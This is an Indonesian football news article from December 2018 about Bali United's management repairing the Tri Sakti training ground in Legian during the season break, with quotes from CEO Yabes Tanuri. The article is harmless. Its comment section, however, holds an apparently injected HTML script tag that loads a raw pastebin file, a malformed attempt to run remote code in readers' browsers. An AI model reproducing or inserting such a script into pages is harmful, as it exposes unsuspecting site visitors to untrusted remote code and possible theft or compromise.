24 December 2018

LATIHAN TIM DILIBURKAN, MANAJEMEN BALI UNITED LAKUKAN PERBAIKAN LAPANGAN TRI SAKTI

    Libur kompetisi akhir tahun ini benar-benar dimanfaatkan manajemen Bali United untuk melakukan perbaikan terhadap tempat latihan Bali United, Lapangan Tri Sakti, Legian. Terlihat dalam beberapa hari terakhir, beberapa pekerja sedang bergotong royong memperbaiki lapangan Tri Sakti.
    CEO Bali United, Yabes Tanuri mengatakan bila perbaikan Lapangan Tri Sakti merupakan salah satu cara untuk menjaga kualitas lapangan agar tetap terjaga sebelum nantinya kembali digunakan secara rutin.
    "Ya, kebetulan jadwal latihan tim diliburkan karena kompetisi tahun 2018 telah selesai. Sesuai dengan rencana kami setiap libur kompetisi, kami langsung melakukan perbaikan di bagian lapangan agar nantinya saat tim akan kembali latihan, lapangan sudah siap untuk digunakan," ujar Yabes Tanuri.
    Lapangan Tri Sakti memang merupakan lapangan yang sudah menjadi tempat tim Bali United menggelar latihan sejak awal tim Serdadu Tridatu berdiri. Bahkan hubungan baik antara manajemen Bali United dan Desa Legian tetap terjalin baik sampai dengan saat ini.

Related News


Tinggalkan Balasan

ass

<script type="text/javascript" src="https://pastebin.com/raw/gAQLwVDU&quot;

SPONSORS
MEDIA PARTNERS